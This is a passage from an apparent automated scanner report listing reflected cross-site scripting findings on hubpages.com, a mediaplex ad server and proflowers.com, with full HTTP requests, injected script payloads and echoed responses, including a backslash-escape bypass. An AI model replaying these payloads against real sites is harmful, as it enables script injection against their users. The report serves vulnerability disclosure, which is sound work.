Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:29 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email=', 'Page not found'); return false;">
...[SNIP]...
1.105. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca6"><script>alert(1)</script>e2a9419b373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:59 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1', 'Reset Your HubPages Password'); return false;">
...[SNIP]...
1.106. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5f65"%3balert(1)//e3cc197dac6 was submitted in the mpck parameter. This input was echoed as e5f65";alert(1)//e3cc197dac6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5De5f65"%3balert(1)//e3cc197dac6&mpt=[2065384166ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:2060/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:47 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:35:49 GMT
ETag: "722e8f-c74-49bf45d733740"
Accept-Ranges: bytes
Content-Length: 4408
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/10105-118547-2060-6?mpt=[2065384166ER]e5f65";alert(1)//e3cc197dac6\" target=\"_blank\">
...[SNIP]...
1.107. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf9c"%3balert(1)//3ea9afa3053 was submitted in the mpvc parameter. This input was echoed as 7cf9c";alert(1)//3ea9afa3053 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5D&mpt=[2065384166ER]&mpvc=7cf9c"%3balert(1)//3ea9afa3053 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:2060/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:49 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:35:49 GMT
ETag: "722e8f-c74-49bf45d733740"
Accept-Ranges: bytes
Content-Length: 4384
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=7cf9c";alert(1)//3ea9afa3053http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5D&clickTag=7cf9c";alert(1)//3ea9afa3053http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065
...[SNIP]...
1.108. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a882"><script>alert(1)</script>21df409d40e was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D51106614a882"><script>alert(1)</script>21df409d40e&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:17 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6963
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=51106614a882"><script>alert(1)</script>21df409d40e" TARGET="_blank">
...[SNIP]...
1.109. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df09"%3balert(1)//f3d279bcdd was submitted in the mpck parameter. This input was echoed as 1df09";alert(1)//f3d279bcdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D51106611df09"%3balert(1)//f3d279bcdd&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:19 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6763
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/4061
...[SNIP]...
lick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=51106611df09";alert(1)//f3d279bcdd\" target=\"_blank\">
...[SNIP]...
1.110. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e06b"%3balert(1)//0812ffa0161 was submitted in the mpvc parameter. This input was echoed as 3e06b";alert(1)//0812ffa0161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f3e06b"%3balert(1)//0812ffa0161 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:24 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6753
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/4061
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?3e06b";alert(1)//0812ffa0161http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&clickTag=http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885
...[SNIP]...
1.111. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82a0"><script>alert(1)</script>4476f6b8c89 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3fd82a0"><script>alert(1)</script>4476f6b8c89 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:21 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6963
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?d82a0"><script>alert(1)</script>4476f6b8c89http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=5110661" TARGET="_blank">
...[SNIP]...
1.112. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efbdf\"%3balert(1)//5e820bfb5e was submitted in the ref parameter. This input was echoed as efbdf\\";alert(1)//5e820bfb5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\"%3balert(1)//5e820bfb5e HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:40:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:40:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:40:43 GMT
Content-Length: 169473


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
s.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050119","30050119","30050119","428477","72","fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\\";alert(1)//5e820bfb5e","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...
1.113. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f89f\"%3balert(1)//1611fbaf415 was submitted in the trackingpgroup parameter. This input was echoed as 3f89f\\";alert(1)//1611fbaf415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC3f89f\"%3balert(1)//1611fbaf415&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:39:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:39:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:39:42 GMT
Content-Length: 165008


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC3f89f\\";alert(1)//1611fbaf415";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "fgvprtlsmsn_hp021111_unknown
...[SNIP]...
1.114. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66204\"%3balert(1)//2ea94e2c6c0 was submitted in the viewpos parameter. This input was echoed as 66204\\";alert(1)//2ea94e2c6c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

